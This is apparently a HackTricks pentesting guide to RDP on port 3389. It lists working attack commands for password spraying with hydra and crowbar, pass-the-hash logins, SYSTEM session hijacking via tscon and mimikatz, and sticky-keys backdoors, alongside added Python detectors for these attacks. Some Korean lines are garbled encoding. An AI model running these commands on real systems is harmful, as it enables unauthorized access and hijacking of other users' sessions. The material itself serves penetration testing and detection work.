3389 - Pentesting RDP

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, the user runs RDP client software while the remote computer runs RDP server software. This setup allows seamless control of and access to a distant computer's desktop environment, essentially bringing its interface to the user's local device.

Default port: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Enumeration

Automatic

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

Checks the available encryption and the DoS vulnerability (without causing a DoS to the service) and obtains NTLM Windows info (version).

Brute force

์ฃผ์˜ํ•˜์„ธ์š”, ๊ณ„์ •์ด ์ž ๊ธธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค

Password Spraying

์ฃผ์˜ํ•˜์„ธ์š”, ๊ณ„์ •์ด ์ž ๊ธธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
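The two tools above both generate Windows Security event 4625 (failed logon) with logon type 10 (RemoteInteractive) on the target. The following detector, added here as an example and not HackTricks' own code, reads a constructed, simplified CSV export of such events and separates a spray (one source, many distinct accounts) from a brute force (one source, many attempts on one account). The CSV field names, the 10-minute window and the thresholds are this example's assumptions.

```python
"""Classify RDP failed-logon bursts as password spraying or brute force.

Added example (not part of HackTricks). Input is a constructed, simplified
export of Windows Security event 4625 with the columns:
timestamp,event_id,logon_type,target_user,source_ip
Logon type 10 = RemoteInteractive (RDP). Field names are assumptions.
"""
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not real data):
#  .50 tries six different users once each   -> spray
#  .77 hammers one account six times         -> brute force
#  .99 one RDP failure plus one non-RDP one  -> benign
SAMPLE_LOG = """\
timestamp,event_id,logon_type,target_user,source_ip
2024-05-01T09:00:01,4625,10,alice,192.168.220.50
2024-05-01T09:00:03,4625,10,bob,192.168.220.50
2024-05-01T09:00:05,4625,10,carol,192.168.220.50
2024-05-01T09:00:07,4625,10,dave,192.168.220.50
2024-05-01T09:00:09,4625,10,erin,192.168.220.50
2024-05-01T09:00:11,4625,10,frank,192.168.220.50
2024-05-01T09:10:00,4625,10,admin,192.168.220.77
2024-05-01T09:10:01,4625,10,admin,192.168.220.77
2024-05-01T09:10:02,4625,10,admin,192.168.220.77
2024-05-01T09:10:03,4625,10,admin,192.168.220.77
2024-05-01T09:10:04,4625,10,admin,192.168.220.77
2024-05-01T09:10:05,4625,10,admin,192.168.220.77
2024-05-01T09:30:00,4625,10,alice,192.168.220.99
2024-05-01T09:31:00,4625,3,svc_backup,192.168.220.99
"""


def detect_rdp_attacks(log_text, window=timedelta(minutes=10),
                       spray_users=5, brute_attempts=5):
    """Return {source_ip: "password_spray" | "brute_force"} for RDP 4625 bursts.

    A sliding time window is kept per source IP. Within one window:
      - >= spray_users distinct target accounts  -> password spray
      - >= brute_attempts failures on one account -> brute force
    Thresholds are assumptions; tune them to the environment's lockout policy.
    """
    by_ip = defaultdict(list)
    for row in csv.DictReader(io.StringIO(log_text)):
        # Only failed RDP (RemoteInteractive) logons are relevant here.
        if row["event_id"] != "4625" or row["logon_type"] != "10":
            continue
        ts = datetime.fromisoformat(row["timestamp"])
        by_ip[row["source_ip"]].append((ts, row["target_user"]))

    findings = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Advance the window start until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            in_window = events[start:end + 1]
            users = {user for _, user in in_window}
            if len(users) >= spray_users:
                findings[ip] = "password_spray"
                break
            if len(in_window) >= brute_attempts and len(users) == 1:
                findings[ip] = "brute_force"
                break
    return findings


if __name__ == "__main__":
    for ip, kind in detect_rdp_attacks(SAMPLE_LOG).items():
        print(f"{ip}: {kind}")
```

Both patterns show up in the same event stream, so the classification matters for response: a spray usually means a valid password is being tested across the directory, while a brute force points at one account to protect with a lockout or an MFA prompt.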

Connect with known credentials/hash

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

Check known credentials against RDP services

rdp_check.py from impacket lets you check whether some credentials are valid for an RDP service:

rdp_check <domain>/<name>:<password>@<IP>

Attacks

Session stealing

With SYSTEM permissions you can access any RDP session opened by any user without needing to know the owner's password.

Get opened sessions:

query user

Access to the selected session

tscon <ID> /dest:<SESSIONNAME>

Now you will be inside the selected RDP session and you will have to impersonate the user using only Windows tools and features.

Important: when you access an active RDP session you will kick out the user that was using it.

You could get passwords by dumping the process, but this method is much faster and lets you interact with the user's virtual desktops (passwords in Notepad that were never saved to disk, other RDP sessions opened on other machines, etc.).

Mimikatz

You could also use mimikatz to do this:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

Sticky-keys & Utilman

์ด ๊ธฐ์ˆ ์„ stickykeys ๋˜๋Š” utilman๊ณผ ๊ฒฐํ•ฉํ•˜๋ฉด ์–ธ์ œ๋“ ์ง€ ๊ด€๋ฆฌ CMD์™€ RDP ์„ธ์…˜์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ด ๊ธฐ์ˆ  ์ค‘ ํ•˜๋‚˜๋กœ ๋ฐฑ๋„์–ด๊ฐ€ ์„ค์ •๋œ RDP๋ฅผ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: https://github.com/linuz/Sticky-Keys-Slayer
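On the defender's side, both the tscon session reattach above and the sticky-keys/utilman backdoor leave a recognisable trace in process-creation telemetry. The following example is added here and is not HackTricks' code: it walks a constructed, simplified export of Windows Security event 4688 (process creation) and flags (a) tscon.exe invoked with /dest:, rated high when the caller is SYSTEM as the technique requires, and (b) a cmd.exe or powershell.exe started by winlogon.exe as SYSTEM, which is what an accessibility tool replaced by or debugged into a shell looks like. The pipe-separated field layout, the account and parent names used as signals, and the severities are this example's assumptions; the mimikatz ts::remote variant does not spawn tscon.exe, so pair rule (a) with session reconnect auditing (event 4778) rather than relying on it alone.

```python
"""Flag RDP session-hijack and accessibility-backdoor patterns in 4688 events.

Added example (not part of HackTricks). Input is a constructed, simplified
export of Windows Security event 4688 with the pipe-separated fields:
timestamp|subject_user|parent_process|new_process|command_line
The layout and the heuristics below are this example's assumptions.
"""
import os

# Constructed sample events (not real data). Lines 1-2 are benign:
# an admin running `query user` is normal. Lines 3-5 match the patterns.
SAMPLE_EVENTS = """\
2024-05-01T10:00:00|CORP\\alice|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\notepad.exe|notepad.exe
2024-05-01T10:01:00|CORP\\admin|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\query.exe|query user
2024-05-01T10:01:30|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\tscon.exe|tscon 2 /dest:console
2024-05-01T10:05:00|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\winlogon.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe
2024-05-01T10:06:00|CORP\\helpdesk|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\tscon.exe|tscon 3 /dest:rdp-tcp#4
"""

SYSTEM_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "SYSTEM"}
SHELLS = {"cmd.exe", "powershell.exe"}


def _base(path):
    """Lower-cased file name of a Windows path, portable across host OSes."""
    return os.path.basename(path.replace("\\", "/")).lower()


def analyze_process_events(log_text):
    """Return a list of findings, one dict per matching process-creation event."""
    findings = []
    for line in log_text.strip().splitlines():
        ts, user, parent, image, cmdline = line.split("|", 4)
        image_name = _base(image)
        parent_name = _base(parent)
        is_system = user.upper() in SYSTEM_ACCOUNTS

        # (a) tscon.exe /dest: reattaches another user's session. The technique
        # needs SYSTEM, so a SYSTEM caller is the strongest signal; any other
        # caller is still worth a look because legitimate use is rare.
        if image_name == "tscon.exe" and "/dest:" in cmdline.lower():
            findings.append({
                "time": ts, "rule": "tscon_session_reattach",
                "severity": "high" if is_system else "medium",
                "user": user, "cmd": cmdline,
            })
        # (b) winlogon.exe launches accessibility tools on the logon screen; a
        # shell in that position, running as SYSTEM, matches the sticky-keys /
        # utilman replacement (binary swap or IFEO debugger) described above.
        elif image_name in SHELLS and parent_name == "winlogon.exe" and is_system:
            findings.append({
                "time": ts, "rule": "winlogon_spawned_shell",
                "severity": "high", "user": user, "cmd": cmdline,
            })
    return findings


if __name__ == "__main__":
    for f in analyze_process_events(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['time']} {f['rule']} {f['user']}: {f['cmd']}")
```

Rule (b) also catches the pre-authentication case, where no user has logged on yet and there is no RDP session to steal: a shell parented by winlogon.exe on the secure desktop has no business reason to exist.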

RDP Process Injection

If someone from a different domain or with better privileges logs in via RDP to a PC where you are an admin, you can inject your beacon into his RDP session process and act as him:

RDP Sessions Abuse

Adding User to RDP group

net localgroup "Remote Desktop Users" UserLoginName /add

Automatic Tools

AutoRDPwn is a post-exploitation framework created in PowerShell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

  • EvilRDP

      • Control mouse and keyboard in an automated manner from the command line

      • Control the clipboard in an automated manner from the command line

      • Spawn a SOCKS proxy from the client that channels network communication to the target via RDP

      • Execute arbitrary SHELL and PowerShell commands on the target without uploading files

      • Upload and download files to/from the target even when file transfers are disabled on the target

  • SharpRDP

This tool lets you execute commands in the victim's RDP session without needing a graphical interface.

HackTricks Automatic Commands

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
